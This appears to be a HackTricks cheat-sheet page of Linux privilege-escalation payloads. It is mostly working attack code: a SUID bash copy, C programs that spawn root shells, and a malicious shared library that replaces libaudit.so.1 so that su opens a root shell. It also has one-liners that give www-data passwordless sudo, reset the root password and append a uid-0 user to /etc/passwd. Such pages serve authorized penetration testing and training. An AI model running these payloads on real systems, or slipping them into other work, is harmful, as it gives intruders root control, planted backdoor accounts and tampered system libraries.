Payloads to execute

Support HackTricks and get benefits!
Bash
1
cp /bin/bash /tmp/b && chmod +s /tmp/b
2
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
Copied!
C
1
//gcc payload.c -o payload
2
int main(void){
3
    setresuid(0, 0, 0); #Set as user suid user
4
    system("/bin/sh");
5
    return 0;
6
}
Copied!
1
//gcc payload.c -o payload
2
#include <stdio.h>
3
#include <unistd.h>
4
#include <sys/types.h>
5
​
6
int main(){
7
    setuid(getuid());
8
    system("/bin/bash");
9
    return 0;
10
}
Copied!
1
// Privesc to user id: 1000
2
#define _GNU_SOURCE
3
#include <stdlib.h>
4
#include <unistd.h>
5
​
6
int main(void) {
7
    char *const paramList[10] = {"/bin/bash", "-p", NULL};
8
    const int id = 1000;
9
    setresuid(id, id, id);
10
    execve(paramList[0], paramList, NULL);
11
    return 0;
12
}
Copied!
Overwriting a file to escalate privileges
Common files
Add user with password to /etc/passwd
Change password inside /etc/shadow
Add user to sudoers in /etc/sudoers
Abuse docker through the docker socket, usually in /run/docker.sock or /var/run/docker.sock
Overwriting a library
Check a library used by some binary, in this case /bin/su:
1
ldd /bin/su
2
        linux-vdso.so.1 (0x00007ffef06e9000)
3
        libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
4
        libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
5
        libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
6
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
7
        libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
8
        libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
9
        /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
Copied!
In this case lets try to impersonate /lib/x86_64-linux-gnu/libaudit.so.1.
So, check for functions of this library used by the su binary:
1
objdump -T /bin/su | grep audit
2
0000000000000000      DF *UND*  0000000000000000              audit_open
3
0000000000000000      DF *UND*  0000000000000000              audit_log_user_message
4
0000000000000000      DF *UND*  0000000000000000              audit_log_acct_message
5
000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd
Copied!
The symbols audit_open, audit_log_acct_message, audit_log_acct_message and audit_fd are probably from the libaudit.so.1 library. As the libaudit.so.1 will be overwritten by the malicious shared library, these symbols should be present in the new shared library, otherwise the program will not be able to find the symbol and will exit.
1
#include<stdio.h>
2
#include<stdlib.h>
3
#include<unistd.h>
4
​
5
//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
6
​
7
int audit_open;
8
int audit_log_acct_message;
9
int audit_log_user_message;
10
int audit_fd;
11
​
12
void inject()__attribute__((constructor));
13
​
14
void inject()
15
{
16
    setuid(0);
17
    setgid(0);
18
    system("/bin/bash");
19
}
Copied!
Now, just calling /bin/su you will obtain a shell as root.
Scripts
Can you make root execute something?
www-data to sudoers
1
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Copied!
Change root password
1
echo "root:hacked" | chpasswd
Copied!
Add new root user to /etc/passwd
1
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
Copied!
Support HackTricks and get benefits!

NFS no_root_squash/no_all_squash misconfiguration PE

RunC Privilege Escalation

Last modified 1mo ago

Copy link

Contents

Bash

Overwriting a file to escalate privileges

Common files

Overwriting a library

Scripts

www-data to sudoers

Change root password

Add new root user to /etc/passwd